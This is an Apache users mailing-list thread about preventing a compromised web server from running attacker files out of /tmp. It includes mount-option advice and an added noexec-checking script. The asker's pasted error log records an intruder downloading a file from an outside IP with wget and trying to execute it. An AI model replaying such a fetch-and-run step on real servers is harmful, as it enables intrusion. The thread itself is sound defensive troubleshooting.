Posted to users@httpd.apache.org by Georgy Goshin <go...@inbox.ee> on 2006/06/02 10:44:31 UTC

[users@httpd] how to prevent an executing from /tmp

Hi!

Someone often uploads files to /tmp and then executes it on the server with 
webserver user privileges. How can I prevent it?



Thanks,
G. 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] how to prevent an executing from /tmp

Posted by Gaël Lams <la...@gmail.com>.
> Someone often uploads files to /tmp and then executes it on the server with
> webserver user privileges. How can I prevent it?

I personally always put /tmp on its own partition and mount it with
the noexec option.

Regards,

Gaël
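
Added example (not part of the original thread, and not the poster's own commands): a shell check for whether the filesystem holding a directory is mounted with noexec, including the case where /tmp is not its own partition and simply inherits the options of /. The function names, the sample mount table and the /var/tmp path are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample in /proc/mounts format:
# device  mountpoint  fstype  options  dump  pass
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda2 /tmp ext3 rw,noexec,nosuid 0 0
/dev/sda3 /home ext3 rw,nosuid 0 0'

# covering_mount DIR [TABLE]
# Prints "mountpoint options" for the longest mount point that is DIR itself
# or a parent of DIR. TABLE defaults to the live /proc/mounts.
covering_mount() {
    dir=$1
    table=${2:-$(cat /proc/mounts)}
    printf '%s\n' "$table" | awk -v d="$dir" '
        {
            mp = $2
            # A mount covers d if it is d, is "/", or is a prefix of d that
            # ends on a "/" boundary (so /tmp does not cover /tmpfoo).
            if (mp == d || mp == "/" || index(d, mp "/") == 1) {
                # ">=" lets a later mount stacked on the same point win.
                if (length(mp) >= length(best)) { best = mp; opts = $4 }
            }
        }
        END { if (best != "") print best, opts }'
}

# has_mount_opt DIR OPT [TABLE]
# Returns 0 if the covering mount carries OPT, 1 if not, 2 if none was found.
has_mount_opt() {
    entry=$(covering_mount "$1" "${3:-}")
    [ -n "$entry" ] || return 2
    opts=${entry#* }
    case ",$opts," in
        *",$2,"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Report over the constructed table; drop the third argument to has_mount_opt
# and the second to covering_mount to audit the running system instead.
for d in /tmp /home /var/tmp; do
    if has_mount_opt "$d" noexec "$SAMPLE_MOUNTS"; then
        echo "OK    $d is on a noexec mount"
    else
        echo "WARN  $d is executable (covered by: $(covering_mount "$d" "$SAMPLE_MOUNTS"))"
    fi
done
```

A directory that is not a mount point of its own, such as /var/tmp in the sample, reports the options of the parent filesystem, which is why a separate partition is needed before noexec can be applied to it alone.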

Re: [users@httpd] how to prevent an executing from /tmp

Posted by Georgy Goshin <go...@inbox.ee>.
Immediately after restart someone downloads the file sysinitrd to /tmp; how do I 
know which virtualhost does this?


[Sat Jun 03 13:30:25 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:25 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:25 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Sat Jun 03 13:30:26 2006] [notice] Digest: generating secret for digest authentication ...
[Sat Jun 03 13:30:26 2006] [notice] Digest: done
[Sat Jun 03 13:30:26 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:26 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:26 2006] [notice] mod_python: Creating 32 session mutexes based on 512 max processes and 0 max threads.
[Sat Jun 03 13:30:27 2006] [notice] Apache/2.0.51 (Fedora) mod_perl/1.99_12 Perl/v5.8.3 DAV/2 PHP/4.3.11 mod_python/3.1.3 Python/2.3.3 mod_ssl/2.0.51 OpenSSL/0.9.7a configured -- resuming normal operations
--13:30:39--  http://212.78.204.20/turbo3000/sysinitd
           => `sysinitd'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]

    0K .......... .......... .......... .                    100%  343.06 KB/s

13:30:39 (343.06 KB/s) - `sysinitd' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied
--13:30:53--  http://212.78.204.20/turbo3000/sysinitd
           => `sysinitd.1'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]

    0K .......... .......... .......... .                    100%  278.19 KB/s

13:30:53 (278.19 KB/s) - `sysinitd.1' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied




And I often find processes with name '-bash' and uid 'apache' - how do I 
disallow this?


I remounted /tmp and /home with noexec,nosuid.


Thanks,
G.

----- Original Message ----- 
From: "JP" <jp...@tulane.edu>
To: <us...@httpd.apache.org>
Sent: Friday, June 02, 2006 5:23 PM
Subject: RE: [users@httpd] how to prevent an executing from /tmp


>>
>> Someone often uploads files to /tmp and then executes it on the server
>> with
>> webserver user privileges. How can I prevent it?
>>
>
> How about changing the umask of the webuser?
>
> JP


RE: [users@httpd] how to prevent an executing from /tmp

Posted by JP <jp...@tulane.edu>.
> 
> Someone often uploads files to /tmp and then executes it on the server
> with
> webserver user privileges. How can I prevent it?
> 

How about changing the umask of the webuser?

JP

